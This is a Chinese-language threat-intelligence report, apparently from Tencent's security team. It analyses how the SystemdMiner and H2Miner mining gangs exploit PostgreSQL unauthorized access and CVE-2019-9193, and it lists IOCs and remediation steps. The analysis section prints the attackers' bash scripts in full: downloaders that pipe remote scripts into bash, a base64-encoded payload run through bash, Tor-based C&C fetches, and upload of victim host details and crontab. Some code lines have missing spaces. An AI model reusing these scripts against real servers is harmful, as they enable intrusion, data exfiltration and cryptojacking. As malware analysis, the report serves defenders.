SystemdMiner、H2Miner挖矿木马利用相同的PostgreSQL漏洞攻击云服务器

腾讯电脑管家

一、背景

腾讯安全威胁情报中心检测到SystemdMiner、H2Miner两个挖矿团伙组合利用PostgreSQL的未授权访问漏洞以及PostgreSQL提权代码执行漏洞（CVE-2019-9193）攻击云服务器。这意味着，存在漏洞的服务器可能同时被多个挖矿木马团伙扫描入侵，如果不同挖矿木马火力全开同时挖矿，服务器就有彻底瘫痪的风险。腾讯安全专家建议政企机构用户尽快修复漏洞，避免沦为黑客控制的肉鸡。

SystemdMiner、H2Miner均是目前流行的挖矿木马，擅长利用各类Web应用漏洞进行批量攻击传播。SystemdMiner入侵系统后会通过Socket5代{过}{滤}理与C&C服务器通信，下载挖矿木马init.x86_64，安装定时任务进行持久化。H2Miner会执行脚本pg2.sh，安装定时任务下载pg.sh，并进一步下载木马kinsing进行挖矿进程维持以及进行端口扫描和Redis爆破攻击。

腾讯安全专家建议企业对以下位置进行检查和清理，并修改PostgreSQL的访问配置，限制不受信任的对象进行访问，谨慎考虑分配pg_read_server_files、pg_write_server_files、pg_execute_server_program 角色权限给数据库用户。：

1.属于用户stolo、postgres下的8位随机名进程；

2.恶意脚本文件：/var/lib/pgsql/.systemd-service.sh；

3.木马文件：/tmp/kinsing、/tmp/kdevtmpfsi。

腾讯安全系列产品已支持检测、防御SystemdMiner、H2Miner挖矿木马，具体响应清单如下：

应用场景	安全产品	解决方案
威    胁    情    报	腾讯T-Sec    威胁情报云查服务    （SaaS）	1）SystemdMiner、H2Miner黑产团伙相关IOCs已入库。    各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics
	腾讯T-Sec    高级威胁追溯系统	1）SystemdMiner、H2Miner黑产团伙相关信息和情报已支持检索。    网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts
云原生    安全    防护	云防火墙    （Cloud Firewall，CFW）	基于网络流量进行威胁检测与主动拦截，已支持：    1）SystemdMiner、H2Miner关联的IOCs已支持识别检测；    2）PostgreSQL提权代码执行漏洞CVE-2019-9193利用检测。       有关云防火墙的更多信息，可参考：   https://cloud.tencent.com/product/cfw
	腾讯T-Sec  主机安全    （Cloud Workload Protection，CWP）	1）已支持查杀SystemdMiner、H2Miner相关木马程序；    2）已支持以下漏洞的检测：    Apache Solr dataimport远程代码执行漏洞(CVE-2019-0193) 、Confluence  未授权RCE(CVE-2019-3396)漏洞、 ThinkPHP远程代码执行漏洞       腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp
	腾讯T-Sec 安全运营中心（SOC）	基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。    关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html
非云企业安全防护	腾讯T-Sec    高级威胁检测系统    （腾讯御界）	1）已支持通过协议检测H2Miner木马与服务器的网络通信；    2）已支持以下漏洞检测：    SaltStack远程命令执行漏洞(CVE-2020-11651、Confluence未授权远程代码执行漏洞(CVE-2019-3396、ThinkPHP远程代码执行漏洞。       关于T-Sec高级威胁检测系统的更多信息，可参考：    https://cloud.tencent.com/product/nta

更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/

二、详细分析

PostgreSQL是一款功能强大的数据库软件，可运行在主流操作系统上，包括Linux、Windows、Mac OSX等。

PostgreSQL未授权访问漏洞

PostgreSQL未授权访问漏洞主要是由于管理员配置不当形成的。PostgreSQL配置文件在/data/pgsql/9.3/data/pg_hba.conf，如果管理员没有正确的配置信任的主机，（如下图），则会导致任意用户无需密码均可访问PostgreSQL数据库。

host表示匹配类型，第一个all表示任何数据库，第二个all表示任何数据库用户的访问，0.0.0.0/0表示任何ip地址访问本数据库服务，最后的trust表示对满足条件的主机免密码登录。

PostgreSQL提权代码执行漏洞（CVE-2019-9193）

2019年3月安全研究人员披露了PostgreSQL提权代码执行漏洞（CVE-2019-9193）的漏洞细节，具有数据库服务端文件读权限的攻击者利用此漏洞，可执行任意系统命令。

此次披露的漏洞存在于导入导出数据的命令“COPY TO/FROM PROGRAM””中，“pg_read_server_files”组内用户执行上述命令后，可获取数据库超级用户权限，从而执行任意系统命令。

受影响版本

PostgreSQL >=9.3

漏洞攻击利用

SystemdMiner和H2Miner挖矿团伙利用PostgreSQL的未授权访问漏洞以及提权代码执行漏洞进行组合攻击，传播挖矿木马。攻击者通过批量扫描5432端口发现PostgreSQL服务器，然后利用管理员配置不当造成的未授权访问漏洞获得了PostgreSQL数据库的访问权限，接着再利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）执行恶意代码。

SystemdMiner利用漏洞攻击后执行的恶意代码：

XRANDOM

exec &>/dev/null

export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

function __curl() {

read proto server path <<<$(echo ${1//// })

DOC=/${path// //}

HOST=${server//:*}

PORT=${server//*:}

  [[x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec3<>/dev/tcp/${HOST}/$PORT

echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n">&3

(while read line; do

   [["$line" == $'\r' ]] && break

done && cat) <&3

exec 3>&-

}

curl -V || __curlhttp://94.237.85.89:8080/curl > /usr/local/bin/curl;chmod +x/usr/local/bin/curl

curl -V || __curlhttp://94.237.85.89:8080/curl > $HOME/curl;chmod +x $HOME/curl

curl -V || __curlhttp://120.27.26.189:81/curl > /usr/local/bin/curl;chmod +x/usr/local/bin/curl

curl -V || __curl http://120.27.26.189:81/curl> $HOME/curl;chmod +x $HOME/curl

d=$(grep x:$(id -u): /etc/passwd|cut -d:-f6)

c=$(echo "curl -4fsSLkA- -m200")

t=$(echo"nssnkct6udyyx6zlv4l6jhqr5jdf643shyerk246fs27ksrdehl2z3qd")

sockz() {

n=(doh.defaultroutes.de dns.hostux.netdns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cndns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.comfi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch)

p=$(echo"dns-query?name=relay.tor2socks.in")

s=$($c https://${n[$((RANDOM))]}/$p | grep-oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|sort -uR|head -1)

}

fexe() {

for i in . $HOME /usr/bin $d /tmp /var/tmp;do echo exit > $i/i && chmod +x $i/i && cd $i &&./i && rm -f i && break;done

}

u() {

sockz

f=/pg.$(uname -m)

x=./$(date|md5sum|cut -f1 -d-)

r=$(curl -4fsSLkcheckip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname-n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab-l|base64 -w0)

$c -x socks5h://$s:9050 $t.onion$f -o$x-e$r || $c $1$f -o$x -e$r

chmod +x $x;$x;rm -f $x

}

for h in tor2web.in tor2web.itonion.foundation tor2web.su onion.com.de

do

if ! ls /proc/$(head -1/tmp/.X11-unix/01)/status; then

fexe;u $t.$h

ls /proc/$(head -1 /tmp/.X11-unix/01)/status|| (cd /tmp;u $t.$h)

ls /proc/$(head -1/tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)

break

fi

done

通过socks5代 理relay.tor2socks.in的方式访问

ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion等C&C地址，从而将C&C地址在数据包头中进行隐藏：

通过代 理下载得到挖矿木马主程序init.x86_64并最终启动8位的随机名挖矿进程，同时上传感染机器IP信息、机器名称。并安装的定时任务进行持久化，定时任务base64解码内容如下：

8 * * * */var/lib/pgsql/.systemd-service.sh > /dev/null 2>&1 &

定时任务执行的.systemd-service.sh脚本如下，其解码后内容与初始攻击时相似：

#!/bin/bash

exec &>/dev/null

echo scO0uBW7WOQTz6MzC9/copUMIA6PvIC4GWMxgHyxU/7gorNqA1JFpzVYle7Lis/9

echoc2NPMHVCVzdXT1FUejZNekM5L2NvcFVNSUE2UHZJQzRHV014Z0h5eFUvN2dvck5xQTFKRnB6VllsZTdMaXMvOQpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJvams1enJhN2IzeXEzMnRpbWIyN240cWo1dWRrNHcybDVrcW41dWxobnVnZHNjZWx0dGZodG95ZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgZG5zLmRucy1vdmVyLWh0dHBzLmNvbSB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2guY2VudHJhbGV1LnBpLWRucy5jb20gZG9oLmRucy5zYiBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyBkbnMuZmxhdHVzbGlmaXIuaXMgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTEzKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC0xKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCnI9JChjdXJsIC00ZnNTTGsgY2hlY2tpcC5hbWF6b25hd3MuY29tfHxjdXJsIC00ZnNTTGsgaXAuc2IpXyQod2hvYW1pKV8kKHVuYW1lIC1tKV8kKHVuYW1lIC1uKV8kKGlwIGF8Z3JlcCAnaW5ldCAnfGF3ayB7J3ByaW50ICQyJ318bWQ1c3VtfGF3ayB7J3ByaW50ICQxJ30pXyQoY3JvbnRhYiAtbHxiYXNlNjQgLXcwKQokYyAteCBzb2NrczVoOi8vJHM6OTA1MCAkdC5vbmlvbiRmIC1vJHggLWUkciB8fCAkYyAkMSRmIC1vJHggLWUkcgpjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaXQgb25pb24uZm91bmRhdGlvbiBvbmlvbi5jb20uZGUgb25pb24uc2ggdG9yMndlYi5zdSB0b3Iyd2ViLmlvCmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC0xIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64-d|bash

H2Miner利用漏洞攻击后执行的恶意代码：

#!/bin/bash

function __curl() {

read proto server path <<<$(echo ${1//// })

DOC=/${path// //}

HOST=${server//:*}

PORT=${server//*:}

  [[x"${HOST}" == x"${PORT}" ]] && PORT=80

exec 3<>/dev/tcp/${HOST}/$PORT

echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n">&3

(while read line; do

   [["$line" == $'\r' ]] && break

done && cat) <&3

exec 3>&-

}

if [ -x "$(command -v curl)" ];then

curl 188.119.112.132/pg.sh|bash

elif [ -x "$(command -v wget)" ];then

wget -q -O- 188.119.112.132/pg.sh|bash

else

__curl http[:]//188.119.112.132/pg2.sh|bash

fi

恶意代码主要功能为下载H2Miner核心脚本pg2.sh并执行。

pg2.sh清理竞品挖矿木马、继续下载二进制木马kinsing并将其安装为服务/lib/systemd/system/bot.service启动，还会安装定时任务下载pg.sh。

kinsing功能与以往版本相同，具有下载维持挖矿进程kdevtmpfsi 、端口扫描和Redis爆破等功能。

IOCs

【SystemdMiner】

IP

94.237.85.89

120.27.26.189

Domain

nssnkct6udyyx6zlv4l6jhqr5jdf643shyerk246fs27ksrdehl2z3qd.onion

plgs6otqdiu7snxdfwjnidhw4ncmp5qvvxi5gepiszg75kxebwci2wad.onion

ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion

i62hmnztfpzwrhjg34m6ruxem5oe36nulzmxcgbdbkiaceubprkta7ad.onion

nssnkct6udyyx6zlv4l6jhqr5jdf643shyerk246fs27ksrdehl2z3qd.tor2web.in

nssnkct6udyyx6zlv4l6jhqr5jdf643shyerk246fs27ksrdehl2z3qd.tor2web.it

nssnkct6udyyx6zlv4l6jhqr5jdf643shyerk246fs27ksrdehl2z3qd.onion.foundation

nssnkct6udyyx6zlv4l6jhqr5jdf643shyerk246fs27ksrdehl2z3qd.tor2web.su

nssnkct6udyyx6zlv4l6jhqr5jdf643shyerk246fs27ksrdehl2z3qd.onion.com.de

md5

.systemd-service.sh

92d83b2b270c1bdf1257adcc9bc0fd9b

Miner

d4a9b852de8857f02ddc80240b7e73ea

【H2Miner】

IP

188.119.112.132

194.40.243.61

URL

http[:]//188.119.112.132/pg.sh

http[:]//188.119.112.132/pg2.sh

http[:]//188.119.112.132/kinsing

http[:]//194.40.243.61/kinsing

md5

pg.sh

255184f7f3725474703c487cf034b441

pg2.sh

9efca16e87f780b42730f55d53c4622a

Kinsing

648effa354b3cbaad87b45f48d59c616

Kdevtmpfsi

8c6681daba966addd295ad89bf5146af

参考链接：

https://github.com/skyship36/CVE-2019-9193

http://blog.nsfocus.net/postgresql-cve-2019-9193/

https://zhuanlan.zhihu.com/p/51032179

https://www.freebuf.com/articles/system/233138.html

https://s.tencent.com/research/report/1183.html